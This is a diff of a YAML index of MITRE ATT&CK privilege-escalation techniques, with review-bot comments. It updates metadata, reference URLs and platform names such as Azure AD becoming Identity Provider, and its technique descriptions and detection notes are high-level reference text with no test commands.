- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17362,7 +17695,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17415,7 +17747,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17436,12 +17768,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17544,7 +17875,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17644,12 +17974,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17662,7 +17991,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17675,7 +18003,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17705,7 +18032,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
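Review bot: this hunk and the two above it for T1547.009 do nothing but move `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` from the middle of the object to its end (with the version bumped from 2.1.0 to 3.2.0), while the T1078.001 hunks further down move the same two keys in the opposite direction. The emitted key order evidently follows upstream object order rather than a fixed one, so every upstream re-serialization shows up here as churn; sorting keys, or pinning a canonical order, in the generator would make these diffs reviewable.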
T1547.005:
@@ -17732,7 +18060,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17758,13 +18086,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17841,12 +18167,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17865,6 +18190,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -17872,7 +18198,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -17892,34 +18217,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
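Review bot: most of the removed and added reference lines in this hunk are a pure reorder; only 'Microsoft CreateProcess' and 'Microsoft WinExec' actually change (learn.microsoft.com URLs and a September 12, 2024 retrieval date), while 'Microsoft Environment Property' is byte-identical and merely moved above 'Microsoft CreateProcess'. Note that the new CreateProcess URL points at the `nf-processthreadsapi-createprocessa` (ANSI) page rather than a variant-neutral one; this matches upstream but is a single-variant link. The added `revoked: false` and the 3.1.0 to 3.2.0 spec bump look correct.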
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -17955,6 +18282,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -17966,16 +18297,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -18011,12 +18338,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
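Review bot: the two harmj0y references move from http://www.harmj0y.net/blog/... to https://blog.harmj0y.net/..., which upgrades the scheme as well as following the domain move; good. Other references in this file still use plain http (the chokepoint.net URL shown as context in the T1055 entry above, for instance) and would benefit from the same refresh upstream; not a blocker for this change.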
@@ -18024,14 +18351,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18046,6 +18372,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -18054,18 +18381,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
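Review bot: this hunk removes 'Azure AD', 'Office 365' and 'Google Workspace' from T1078.001's `x_mitre_platforms` and adds 'Office Suite' and 'Identity Provider' (version 1.3 to 1.4), and the same substitution appears for T1548 and T1548.005 further down. Any per-platform index generated from these platform strings will silently drop these techniques unless the generator knows the new names, so the platform-keyed index files should be regenerated in this same change and the new names mapped to index files where one is wanted.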
@@ -18097,9 +18424,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18171,7 +18495,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18198,7 +18521,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18224,13 +18547,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18351,12 +18672,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18388,11 +18708,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18433,11 +18752,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -18493,12 +18811,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18555,7 +18872,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18625,7 +18941,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18735,7 +19050,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18789,7 +19103,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18822,13 +19136,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18890,10 +19202,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -18951,7 +19262,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -18993,7 +19303,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -19052,8 +19362,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -19083,7 +19391,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19118,12 +19426,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19200,7 +19506,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19239,7 +19544,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19288,8 +19593,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19321,7 +19624,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19369,13 +19672,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19388,16 +19689,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19409,16 +19710,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
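Review bot: alongside replacing 'Azure AD' with 'Identity Provider' (version 1.2 to 1.3), this hunk also removes 'SaaS' from T1098.005's platforms, while the description's first paragraph (context above) still frames device registration in terms of an MFA self-enrollment process that is not specific to Entra ID. Presumably 'Identity Provider' is meant to absorb that case upstream; if so, a one-line note in the PR description would save the next reader from wondering whether the SaaS drop is a regression.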
@@ -19473,7 +19774,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19496,7 +19796,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19540,8 +19840,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19618,7 +19916,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19646,8 +19944,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19706,23 +20002,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
